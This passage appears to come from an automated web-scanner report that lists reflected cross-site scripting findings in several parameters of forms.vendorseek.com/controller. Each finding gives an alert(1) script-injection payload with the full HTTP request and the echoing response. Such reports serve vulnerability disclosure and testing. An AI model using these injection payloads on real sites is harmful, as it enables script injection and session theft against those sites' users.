R=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.7. http://forms.vendorseek.com/controller [CCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb8e"><script>alert(1)</script>dfcd6822df6 was submitted in the CCID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:12 GMT
Connection: close
Set-Cookie: JSESSIONID=0E36DD64A50C2D282E735CD156668F43.app6-all1; Path=/
Set-Cookie: JSESSIONID=E2550155D6E4EFD0579CBF2B167A9C8C.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033292382; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&ex
...[SNIP]...

3.8. http://forms.vendorseek.com/controller [CLK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the CLK request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e01a"><script>alert(1)</script>d5e0b5efd26 was submitted in the CLK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:15 GMT
Connection: close
Set-Cookie: JSESSIONID=97488A1C53BFAFB108423AFF2D7F92C9.app5-all1; Path=/
Set-Cookie: JSESSIONID=AA06C727F48CC5BA4A08EED6D6E7F962.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/
Set-Cookie: CLK=0#1298033295843; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
dorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf2010040619
...[SNIP]...

3.9. http://forms.vendorseek.com/controller [InternalReferralURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the InternalReferralURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac76"><script>alert(1)</script>45061f4f32c was submitted in the InternalReferralURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:23 GMT
Connection: close
Set-Cookie: JSESSIONID=A5BFF0A049DAE2062A18A05DB6808013.app6-all2; Path=/
Set-Cookie: JSESSIONID=6C9BC97FBF58D500C46BFF41AD62167E.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033303466; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
91Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.10. http://forms.vendorseek.com/controller [LeadSiteURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the LeadSiteURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33571"><script>alert(1)</script>d012466242a was submitted in the LeadSiteURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:11 GMT
Connection: close
Set-Cookie: JSESSIONID=5745F7537F6FF26244F0BBF2D83D9195.app6-all1; Path=/
Set-Cookie: JSESSIONID=D08D1E17C3723FAE8D5F6D0ADAD078E0.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033291167; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
Sheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK
...[SNIP]...

3.11. http://forms.vendorseek.com/controller [QTR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the QTR request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da96"><script>alert(1)</script>f7d751f0855 was submitted in the QTR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:14 GMT
Connection: close
Set-Cookie: JSESSIONID=0C327276CFAF6BFEE0761D648120B850.app6-all1; Path=/
Set-Cookie: JSESSIONID=FF4F447CF06837452E74C4CF33F1D184.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033294601; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
C_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=201142572035
...[SNIP]...

3.12. http://forms.vendorseek.com/controller [css parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98725"><script>alert(1)</script>035a41fdd3c was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:58 GMT
Connection: close
Set-Cookie: JSESSIONID=0910819EB9444DED0E32F7B56016470F.app6-all1; Path=/
Set-Cookie: JSESSIONID=280969539BE31D1AA4983B1943C38702.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033278800; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/
Content-Length: 3857

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<link rel="stylesheet" href="http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c">
...[SNIP]...

3.13. http://forms.vendorseek.com/controller [ctnum parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the ctnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c714"><script>alert(1)</script>0772ed318db was submitted in the ctnum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:47:57 GMT
Connection: close
Set-Cookie: JSESSIONID=0B2B9F1AF510C2F672A168D452B24955.app5-all1; Path=/
Set-Cookie: JSESSIONID=3871577464F826A4332EED1ACEF87DB2.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033277011; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
<Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com
...[SNIP]...

3.14. http://forms.vendorseek.com/controller [fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the fc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc2c"><script>alert(1)</script>8ed63916645 was submitted in the fc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:05 GMT
Connection: close
Set-Cookie: JSESSIONID=971716267306361C96314EFB8680F444.app6-all1; Path=/
Set-Cookie: JSESSIONID=3E58315EDD56ED38C0FF84375578D7CD.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033285157; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
